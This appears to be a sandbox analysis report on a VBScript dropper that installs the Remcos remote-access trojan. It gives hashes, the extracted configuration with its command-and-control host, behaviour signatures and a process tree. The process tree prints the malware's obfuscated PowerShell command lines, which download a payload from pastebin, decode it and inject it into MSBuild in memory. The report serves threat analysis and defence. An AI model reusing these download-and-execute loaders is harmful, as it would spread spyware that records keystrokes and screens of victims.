Analysis
max time kernel: 149s
max time network: 149s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 07/11/2024, 21:34
Static task: static1
Behavioral task: behavioral1
Sample: target.vbs
Resource: win7-20241010-en
General
Target: target.vbs
Size: 6KB
MD5: 2dffd2a836e52c50a0c917e46a5868a1
SHA1: af5fa54fbd090e1aae6502b5fa0ab00e3f4acd24
SHA256: 83b9bc8d2f4ef6a85965de118a374157d1054dbfb5a1f57bdaafafaa3ec07f11
SHA512: e924755e2592980980d8431a63487dc650775f6b1296abf861d81beb70b01d82b83331cc9ce6c79cf8832db54ac2a4d20d4e2b510f9103e13115a8c8e58aacaa
SSDEEP: 96:eqUcAePyt8dA+AkDvgsZqW7bBFhfH7HK0c3Dm7aGnGcdUd66VX7txI7ezF:99PZzDbN7bJvD1czm7lG0UdvjRzF
Malware Config
Extracted: https://pastebin.com/raw/J6uRjZrv
Extracted: remcos
Nt
sremc.duckdns.org:2404
audio_folder: MicRecords
audio_path: ApplicationPath
audio_record_time: 5
connect_delay: 0
connect_interval: 1
copy_file: remcos.exe
copy_folder: Remcos
delete_file: false
hide_file: false
hide_keylog_file: false
install_flag: false
keylog_crypt: false
keylog_file: logs.dat
keylog_flag: false
keylog_folder: remcos
mouse_option: false
mutex: Rmc-29CPLV
screenshot_crypt: false
screenshot_flag: false
screenshot_folder: Screenshots
screenshot_path: %AppData%
screenshot_time: 10
take_screenshot_option: false
take_screenshot_time: 5
Signatures

Remcos family

Blocklisted process makes network request (6 IoCs)
flow  pid   Process
9     4016  powershell.exe
18    2180  powershell.exe
21    2180  powershell.exe
25    4016  powershell.exe
29    4016  powershell.exe
33    4016  powershell.exe

pid   Process
2704  powershell.exe
4016  powershell.exe

Checks computer location settings (2 TTPs, 1 IoCs)
Looks up country code configured in the registry, likely geofence.
description: Key value queried
ioc: \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation
Process: WScript.exe

Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 5 IoCs)
flow  ioc
17    bitbucket.org
18    bitbucket.org
25    bitbucket.org
5     pastebin.com
9     pastebin.com

Obfuscated Files or Information: Command Obfuscation (1 TTPs)
Adversaries may obfuscate content during command execution to impede detection.

Suspicious use of SetThreadContext (1 IoCs)
description: PID 4016 set thread context of 5044
pid: 4016
Process: powershell.exe
procid_target: 107

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery (1 TTPs, 1 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description: Key opened
ioc: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Process: MSBuild.exe

System Network Configuration Discovery: Internet Connection Discovery (1 TTPs, 1 IoCs)
Adversaries may check for Internet connectivity on compromised systems.
pid: 4708
Process: PING.EXE

Runs ping.exe (1 TTPs, 1 IoCs)
pid: 4708
Process: PING.EXE

Suspicious behavior: EnumeratesProcesses (8 IoCs)
pid   Process
2704  powershell.exe
2704  powershell.exe
4016  powershell.exe
4016  powershell.exe
2180  powershell.exe
2180  powershell.exe
4016  powershell.exe
4016  powershell.exe

Suspicious use of AdjustPrivilegeToken (3 IoCs)
description              pid   Process
Token: SeDebugPrivilege  2704  powershell.exe
Token: SeDebugPrivilege  4016  powershell.exe
Token: SeDebugPrivilege  2180  powershell.exe

Suspicious use of SetWindowsHookEx (1 IoCs)
pid: 5044
Process: MSBuild.exe

Suspicious use of WriteProcessMemory (23 IoCs)
description                        pid   Process         procid_target
PID 1540 wrote to memory of 2704   1540  WScript.exe     83
PID 1540 wrote to memory of 2704   1540  WScript.exe     83
PID 2704 wrote to memory of 4016   2704  powershell.exe  85
PID 2704 wrote to memory of 4016   2704  powershell.exe  85
PID 4016 wrote to memory of 5068   4016  powershell.exe  90
PID 4016 wrote to memory of 5068   4016  powershell.exe  90
PID 4016 wrote to memory of 4708   4016  powershell.exe  91
PID 4016 wrote to memory of 4708   4016  powershell.exe  91
PID 4016 wrote to memory of 2180   4016  powershell.exe  97
PID 4016 wrote to memory of 2180   4016  powershell.exe  97
PID 4016 wrote to memory of 2664   4016  powershell.exe  106
PID 4016 wrote to memory of 2664   4016  powershell.exe  106
PID 4016 wrote to memory of 2664   4016  powershell.exe  106
PID 4016 wrote to memory of 5044   4016  powershell.exe  107
PID 4016 wrote to memory of 5044   4016  powershell.exe  107
PID 4016 wrote to memory of 5044   4016  powershell.exe  107
PID 4016 wrote to memory of 5044   4016  powershell.exe  107
PID 4016 wrote to memory of 5044   4016  powershell.exe  107
PID 4016 wrote to memory of 5044   4016  powershell.exe  107
PID 4016 wrote to memory of 5044   4016  powershell.exe  107
PID 4016 wrote to memory of 5044   4016  powershell.exe  107
PID 4016 wrote to memory of 5044   4016  powershell.exe  107
PID 4016 wrote to memory of 5044   4016  powershell.exe  107
Processes

[1] C:\Windows\System32\WScript.exe (PID 1540)
    Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\target.vbs"
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory

  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2704)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT☹Hk☹cwB0☹GU☹bQ☹u☹E4☹ZQB0☹C4☹UwBl☹HI☹dgBp☹GM☹ZQBQ☹G8☹aQBu☹HQ☹TQBh☹G4☹YQBn☹GU☹cgBd☹Do☹OgBT☹GU☹YwB1☹HI☹aQB0☹Hk☹U☹By☹G8☹d☹Bv☹GM☹bwBs☹C☹☹PQ☹g☹Fs☹UwB5☹HM☹d☹Bl☹G0☹LgBO☹GU☹d☹☹u☹FM☹ZQBj☹HU☹cgBp☹HQ☹eQBQ☹HI☹bwB0☹G8☹YwBv☹Gw☹V☹B5☹H☹☹ZQBd☹Do☹OgBU☹Gw☹cw☹x☹DI☹Ow☹k☹EM☹QwBS☹Gg☹bQ☹g☹D0☹I☹☹n☹Gg☹d☹B0☹H☹☹cw☹6☹C8☹LwBw☹GE☹cwB0☹GU☹YgBp☹G4☹LgBj☹G8☹bQ☹v☹HI☹YQB3☹C8☹Sg☹2☹HU☹UgBq☹Fo☹cgB2☹Cc☹I☹☹7☹CQ☹Zg☹g☹D0☹I☹☹o☹Fs☹UwB5☹HM☹d☹Bl☹G0☹LgBJ☹E8☹LgBQ☹GE☹d☹Bo☹F0☹Og☹6☹Ec☹ZQB0☹FQ☹ZQBt☹H☹☹U☹Bh☹HQ☹a☹☹o☹Ck☹I☹☹r☹C☹☹JwBk☹Gw☹b☹☹w☹DE☹LgB0☹Hg☹d☹☹n☹Ck☹I☹☹7☹Ek☹bgB2☹G8☹awBl☹C0☹VwBl☹GI☹UgBl☹HE☹dQBl☹HM☹d☹☹g☹C0☹VQBS☹Ek☹I☹☹k☹EM☹QwBS☹Gg☹bQ☹g☹C0☹TwB1☹HQ☹RgBp☹Gw☹ZQ☹g☹CQ☹Zg☹g☹C0☹VQBz☹GU☹QgBh☹HM☹aQBj☹F☹☹YQBy☹HM☹aQBu☹Gc☹I☹☹7☹GM☹bQBk☹C4☹ZQB4☹GU☹I☹☹v☹GM☹I☹☹7☹H☹☹aQBu☹Gc☹I☹☹x☹DI☹Nw☹u☹D☹☹Lg☹w☹C4☹MQ☹g☹Ds☹c☹Bv☹Hc☹ZQBy☹HM☹a☹Bl☹Gw☹b☹☹u☹GU☹e☹Bl☹C☹☹LQBj☹G8☹bQBt☹GE☹bgBk☹C☹☹ew☹k☹GY☹I☹☹9☹C☹☹K☹Bb☹FM☹eQBz☹HQ☹ZQBt☹C4☹SQBP☹C4☹U☹Bh☹HQ☹a☹Bd☹Do☹OgBH☹GU☹d☹BU☹GU☹bQBw☹F☹☹YQB0☹Gg☹K☹☹p☹C☹☹Kw☹g☹Cc☹Z☹Bs☹Gw☹M☹☹x☹C4☹d☹B4☹HQ☹Jw☹p☹C☹☹Ow☹k☹FE☹U☹B0☹GE☹dg☹g☹D0☹I☹☹o☹C☹☹RwBl☹HQ☹LQBD☹G8☹bgB0☹GU☹bgB0☹C☹☹LQBQ☹GE☹d☹Bo☹C☹☹J☹Bm☹C☹☹KQ☹g☹Ds☹SQBu☹HY☹bwBr☹GU☹LQBX☹GU☹YgBS☹GU☹cQB1☹GU☹cwB0☹C☹☹LQBV☹FI☹SQ☹g☹CQ☹UQBQ☹HQ☹YQB2☹C☹☹LQBP☹HU☹d☹BG☹Gk☹b☹Bl☹C☹☹J☹Bm☹C☹☹LQBV☹HM☹ZQBC☹GE☹cwBp☹GM☹U☹Bh☹HI☹cwBp☹G4☹ZwB9☹C☹☹Ow☹k☹FE☹U☹B0☹GE☹dg☹g☹D0☹I☹☹o☹C☹☹RwBl☹HQ☹LQBD☹G8☹bgB0☹GU☹bgB0☹C☹☹LQBQ☹GE☹d☹Bo☹C☹☹J☹Bm☹C☹☹KQ☹g☹Ds☹J☹Bs☹HU☹bwBy☹H☹☹I☹☹9☹C☹☹Jw☹w☹Cc☹I☹☹7☹CQ☹e☹Bt☹HY☹bgBq☹C☹☹PQ☹g☹Cc☹JQBK☹Gs☹UQBh☹HM☹R☹Bm☹Gc☹cgBU☹Gc☹JQ☹n☹C☹☹OwBb☹EI☹eQB0☹GU☹WwBd☹F0☹I☹☹k☹Gc☹aQBr☹Hc☹eQ☹g☹D0☹I☹Bb☹HM☹eQBz☹HQ☹ZQBt☹C4☹QwBv☹G4☹dgBl☹HI☹d☹Bd☹Do☹OgBG☹HI☹bwBt☹EI☹YQBz☹GU☹Ng☹0☹FM☹d☹By☹Gk☹bgBn☹Cg☹I☹☹k☹FE☹U☹B0☹GE☹dg☹u☹HI☹ZQBw☹Gw☹YQBj☹GU☹K☹☹n☹CQ☹J☹☹n☹Cw☹JwBB☹Cc☹KQ☹g☹Ck☹I☹☹7☹Fs☹UwB5☹HM☹d☹Bl☹G0☹LgBB☹H☹☹c☹BE☹G8☹bQBh☹Gk☹bgBd☹Do☹OgBD☹HU☹cgBy☹GU☹bgB0☹EQ☹bwBt☹GE☹aQBu☹C4☹T☹Bv☹GE☹Z☹☹o☹CQ☹ZwBp☹Gs☹dwB5☹Ck☹LgBH☹GU☹d☹BU☹Hk☹c☹Bl☹Cg☹JwBU☹GU☹a☹B1☹Gw☹YwBo☹GU☹cwBY☹Hg☹W☹B4☹Hg☹LgBD☹Gw☹YQBz☹HM☹MQ☹n☹Ck☹LgBH☹GU☹d☹BN☹GU☹d☹Bo☹G8☹Z☹☹o☹Cc☹TQBz☹HE☹QgBJ☹GI☹WQ☹n☹Ck☹LgBJ☹G4☹dgBv☹Gs☹ZQ☹o☹CQ☹bgB1☹Gw☹b☹☹s☹C☹☹WwBv☹GI☹agBl☹GM☹d☹Bb☹F0☹XQ☹g☹Cg☹Jw☹w☹C8☹VgB0☹HU☹d☹BQ☹C8☹Z☹☹v☹GU☹ZQ☹u☹GU☹d☹Bz☹GE☹c☹☹v☹C8☹OgBz☹H☹☹d☹B0☹Gg☹Jw☹g☹Cw☹I☹☹k☹Hg☹bQB2☹G4☹ag☹g☹Cw☹I☹☹n☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹Xw☹t☹C0☹LQ☹t☹C0☹LQ☹t☹Cc☹L☹☹g☹CQ☹b☹B1☹G8☹cgBw☹Cw☹I☹☹n☹DE☹Jw☹s☹C☹☹JwBS☹G8☹Z☹Bh☹Cc☹I☹☹p☹Ck☹Ow☹=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('☹','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\Admin\AppData\Local\Temp\target.vbs');powershell $Yolopolhggobek;
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4016)
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$luorp = '0' ;$xmvnj = 'C:\Users\Admin\AppData\Local\Temp\target.vbs' ;[Byte[]] $gikwy = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($gikwy).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0/VtutP/d/ee.etsap//:sptth' , $xmvnj , '____________________________________________-------', $luorp, '1', 'Roda' ));"
        - Blocklisted process makes network request
        - Command and Scripting Interpreter: PowerShell
        - Suspicious use of SetThreadContext
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory

      [4] C:\Windows\system32\cmd.exe (PID 5068)
          Command line: "C:\Windows\system32\cmd.exe" /c

      [4] C:\Windows\system32\PING.EXE (PID 4708)
          Command line: "C:\Windows\system32\PING.EXE" 127.0.0.1
          - System Network Configuration Discovery: Internet Connection Discovery
          - Runs ping.exe

      [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2180)
          Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text
          - Blocklisted process makes network request
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken

      [4] C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe (PID 2664)
          Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

      [4] C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe (PID 5044)
          Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
          - System Location Discovery: System Language Discovery
          - Suspicious use of SetWindowsHookEx
MITRE ATT&CK Enterprise v15
Downloads